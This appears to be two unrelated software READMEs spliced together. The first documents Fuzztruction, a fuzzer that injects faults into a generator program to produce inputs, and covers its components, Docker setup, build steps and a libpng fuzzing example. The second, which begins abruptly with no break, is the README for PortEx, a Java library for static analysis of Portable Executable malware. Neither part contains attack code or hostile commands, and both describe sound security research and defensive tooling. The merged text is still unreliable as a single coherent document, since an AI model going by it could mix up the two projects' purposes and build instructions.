# See `Fuzzing a Target using Fuzztruction` below for further instructions.
Fuzztruction contains the following core components:
The scheduler orchestrates the interaction of the generator and the consumer. It governs the fuzzing campaign, and its main task is to organize the fuzzing loop. In addition, it also maintains a queue containing queue entries. Each entry consists of the seed input passed to the generator (if any) and all mutations applied to the generator. Each such queue entry represents a single test case. In traditional fuzzing, such a test case would be represented as a single file. The implementation of the scheduler is located in the scheduler
directory.
The generator can be considered a seed generator for producing inputs tailored to the fuzzing target, the consumer. While common fuzzing approaches mutate inputs on the fly through bit-level mutations, we mutate inputs indirectly by injecting faults into the generator program. More precisely, we identify and mutate data operations the generator uses to produce its output. To facilitate our approach, we require a program that generates outputs that match the input format the fuzzing target expects.
The implementation of the generator can be found in the generator
directory. It consists of two components that are explained in the following.
The compiler pass (generator/pass
) instruments the target using so-called patch points. Since the current (tested on LLVM12 and below) implementation of this feature is unstable, we patch LLVM to enable them for our approach. The patches can be found in the llvm
repository (included here as submodule). Please note that the patches are experimental and not intended for use in production.
The locations of the patch points are recorded in a separate section inside the compiled binary. The code related to parsing this section can be found at lib/llvm-stackmap-rs
, which we also published on crates.io.
During fuzzing, the scheduler chooses a target from the set of patch points and passes its decision down to the agent (described below) responsible for applying the desired mutation for the given patch point.
The agent, implemented in generator/agent
is running in the context of the generator application that was compiled with the custom compiler pass. Its main tasks are the implementation of a forkserver and communicating with the scheduler. Based on the instruction passed from the scheduler via shared memory and a message queue, the agent uses a JIT engine to mutate the generator.
The generator's counterpart is the consumer: It is the target we are fuzzing that consumes the inputs generated by the generator. For Fuzztruction, it is sufficient to compile the consumer application with AFL++'s compiler pass, which we use to record the coverage feedback. This feedback guides our mutations of the generator.
Before using Fuzztruction, the runtime environment that comes as a Docker image is required. This image can be obtained by building it yourself locally or pulling a pre-built version. Both ways are described in the following. Before preparing the runtime environment, this repository, and all sub repositories, must be cloned:
git clone --recurse-submodules https://github.com/fuzztruction/fuzztruction.git
The Fuzztruction runtime environment can be built by executing env/build.sh
. This builds a Docker image containing a complete runtime environment for Fuzztruction locally. By default, a pre-built version of our patched LLVM version is used and pulled from Docker Hub. If you want to use a locally built LLVM version, check the llvm
directory.
In most cases, there is no particular reason for using the pre-built environment -- except if you want to reproduce the exact experiments conducted in the paper. The pre-built image provides everything, including the pre-built evaluation targets and all dependencies. The image can be retrieved by executing env/pull-prebuilt.sh
.
The following section documents how to spawn a runtime environment based on either a locally built image or the prebuilt one. Details regarding the reproduction of the paper's experiments can be found in the fuzztruction-experiments
submodule.
After building or pulling a pre-built version of the runtime environment, the fuzzer is ready to use. The fuzzers environment lifecycle is managed by a set of scripts located in the env
folder.
Script | Description |
---|---|
./env/start.sh | Spawn a new container or spawn a shell into an already running container. Prebuilt: Exporting USE_PREBUILT=1 spawns a container based on a pre-built environment. For switching from pre-build to local build or the other way around, stop.sh must be executed first. |
./env/stop.sh | This stops the container. Remember to call this after rebuilding the image. |
Using start.sh
, an arbitrary number of shells can be spawned in the container. Using Visual Studio Codes' Containers extension allows you to work conveniently inside the Docker container.
Several files/folders are mounted from the host into the container to facilitate data exchange. Details regarding the runtime environment are provided in the next section.
This section details the runtime environment (Docker container) provided alongside Fuzztruction. The user in the container is named user
and has passwordless sudo
access per default.
Permissions: The Docker images' user is named
user
and has the same User ID (UID) as the user who initially built the image. Thus, mounts from the host can be accessed inside the container. However, in the case of using the pre-built image, this might not be the case since the image was built on another machine. This must be considered when exchanging data with the host.
Inside the container, the following paths are (bind) mounted from the host:
Container Path | Host Path | Note |
---|---|---|
/home/user/fuzztruction | ./ | Pre-built: This folder is part of the image in case the pre-built image is used. Thus, changes are not reflected to the host. |
/home/user/shared | ./ | Used to exchange data with the host. |
/home/user/.zshrc | ./data/zshrc | - |
/home/user/.zsh_history | ./data/zsh_history | - |
/home/user/.bash_history | ./data/bash_history | - |
/home/user/.config/nvim/init.vim | ./data/init.vim | - |
/home/user/.config/Code | ./data/vscode-data | Used to persist Visual Studio Code config between container restarts. |
/ssh-agent | $SSH_AUTH_SOCK | Allows using the SSH-Agent inside the container if it runs on the host. |
/home/user/.gitconfig | /home/$USER/.gitconfig | Use gitconfig from the host, if there is any config. |
/ccache | ./data/ccache | Used to persist ccache cache between container restarts. |
After building the Docker runtime environment and spawning a container, the Fuzztruction binary itself must be built. After spawning a shell inside the container using ./env/start.sh
, the build process is triggered automatically. Thus, the steps in the next section are primarily for those who want to rebuild Fuzztruction after applying modifications to the code.
For building Fuzztruction, it is sufficient to call cargo build
in /home/user/fuzztruction
. This will build all components described in the Components section. The most interesting build artifacts are the following:
Artifacts | Description |
---|---|
./generator/pass/fuzztruction-source-llvm-pass.so | The LLVM pass is used to insert the patch points into the generator application. Note: The location of the pass is recorded in /etc/ld.so.conf.d/fuzztruction.conf ; thus, compilers are able to find the pass during compilation. If you run into trouble because the pass is not found, please run sudo ldconfig and retry using a freshly spawned shell. |
./generator/pass/fuzztruction-source-clang-fast | A compiler wrapper for compiling the generator application. This wrapper uses our custom compiler pass, links the targets against the agent, and injects a call to the agents' init method into the generator's main. |
./target/debug/libgenerator_agent.so | The agent the is injected into the generator application. |
./target/debug/fuzztruction | The fuzztruction binary representing the actual fuzzer. |
We will use libpng
as an example to showcase Fuzztruction's capabilities. Since libpng
is relatively small and has no external dependencies, it is not required to use the pre-built image for the following steps. However, especially on mobile CPUs, the building process may take up to several hours for building the AFL++ binary because of the collision free coverage map encoding feature and compare splitting.
Pre-built: If the pre-built version is used, building is unnecessary and this step can be skipped.
Switch into the fuzztruction-experiments/comparison-with-state-of-the-art/binaries/
directory and execute ./build.sh libpng
. This will pull the source and start the build according to the steps defined in libpng/config.sh
.
Using the following command
sudo ./target/debug/fuzztruction fuzztruction-experiments/comparison-with-state-of-the-art/configurations/pngtopng_pngtopng/pngtopng-pngtopng.yml --purge --show-output benchmark -i 100
allows testing whether the target works. Each target is defined using a YAML
configuration file. The files are located in the configurations
directory and are a good starting point for building your own config. The pngtopng-pngtopng.yml
file is extensively documented.
If the fuzzer terminates with an error, there are multiple ways to assist your debugging efforts.
--show-output
to fuzztruction
allows you to observe stdout/stderr of the generator and the consumer if they are not used for passing or reading data from each other.env
section of the sink
in the YAML
config can give you a more detailed output regarding the consumer.LD_PRELOAD
, double check the provided paths.To start the fuzzing process, executing the following command is sufficient:
sudo ./target/debug/fuzztruction ./fuzztruction-experiments/comparison-with-state-of-the-art/configurations/pngtopng_pngtopng/pngtopng-pngtopng.yml fuzz -j 10 -t 10m
This will start a fuzzing run on 10 cores, with a timeout of 10 minutes. Output produced by the fuzzer is stored in the directory defined by the work-directory
attribute in the target's config file. In case of pngtopng
, the default location is /tmp/pngtopng-pngtopng
.
If the working directory already exists, --purge
must be passed as an argument to fuzztruction
to allow it to rerun. The flag must be passed before the subcommand, i.e., before fuzz
or benchmark
.
For running AFL++ alongside Fuzztruction, the aflpp
subcommand can be used to spawn AFL++ workers that are reseeded during runtime with inputs found by Fuzztruction. Assuming that Fuzztruction was executed using the command above, it is sufficient to execute
sudo ./target/debug/fuzztruction ./fuzztruction-experiments/comparison-with-state-of-the-art/configurations/pngtopng_pngtopng/pngtopng-pngtopng.yml aflpp -j 10 -t 10m
for spawning 10 AFL++ processes that are terminated after 10 minutes. Inputs found by Fuzztruction and AFL++ are periodically synced into the interesting
folder in the working directory. In case AFL++ should be executed independently but based on the same .yml
configuration file, the --suffix
argument can be used to append a suffix to the working directory of the spawned fuzzer.
After the fuzzing run is terminated, the tracer
subcommand allows to retrieve a list of covered basic blocks for all interesting inputs found during fuzzing. These traces are stored in the traces
subdirectory located in the working directory. Each trace contains a zlib compressed JSON object of the addresses of all basic blocks (in execution order) exercised during execution. Furthermore, metadata to map the addresses to the actual ELF file they are located in is provided.
The coverage
tool located at ./target/debug/coverage
can be used to process the collected data further. You need to pass it the top-level directory containing working directories created by Fuzztruction (e.g., /tmp
in case of the previous example). Executing ./target/debug/coverage /tmp
will generate a .csv
file that maps time to the number of covered basic blocks and a .json
file that maps timestamps to sets of found basic block addresses. Both files are located in the working directory of the specific fuzzing run.
PortEx is a Java library for static malware analysis of Portable Executable files. Its focus is on PE malformation robustness, and anomaly detection. PortEx is written in Java and Scala, and targeted at Java applications.
For more information have a look at PortEx Wiki and the Documentation
PortexAnalyzer CLI is a command line tool that runs the library PortEx under the hood. If you are looking for a readily compiled command line PE scanner to analyse files with it, download it from here PortexAnalyzer.jar
The GUI version is available here: PortexAnalyzerGUI
You can include PortEx to your project by adding the following Maven dependency:
<dependency>
<groupId>com.github.katjahahn</groupId>
<artifactId>portex_2.12</artifactId>
<version>4.0.0</version>
</dependency>
To use a local build, add the library as follows:
<dependency>
<groupId>com.github.katjahahn</groupId>
<artifactId>portex_2.12</artifactId>
<version>4.0.0</version>
<scope>system</scope>
<systemPath>$PORTEXDIR/target/scala-2.12/portex_2.12-4.0.0.jar</systemPath>
</dependency>
Add the dependency as follows in your build.sbt
libraryDependencies += "com.github.katjahahn" % "portex_2.12" % "4.0.0"
PortEx is build with sbt
To simply compile the project invoke:
$ sbt compile
To create a jar:
$ sbt package
To compile a fat jar that can be used as command line tool, type:
$ sbt assembly
You can create an eclipse project by using the sbteclipse plugin. Add the following line to project/plugins.sbt:
addSbtPlugin("com.typesafe.sbteclipse" % "sbteclipse-plugin" % "2.4.0")
Generate the project files for Eclipse:
$ sbt eclipse
Import the project to Eclipse via the Import Wizard.
I develop PortEx and PortexAnalyzer as a hobby in my freetime. If you like it, please consider buying me a coffee: https://ko-fi.com/struppigel
Karsten Hahn
Twitter: @Struppigel
Mastodon: struppigel@infosec.exchange
Youtube: MalwareAnalysisForHedgehogs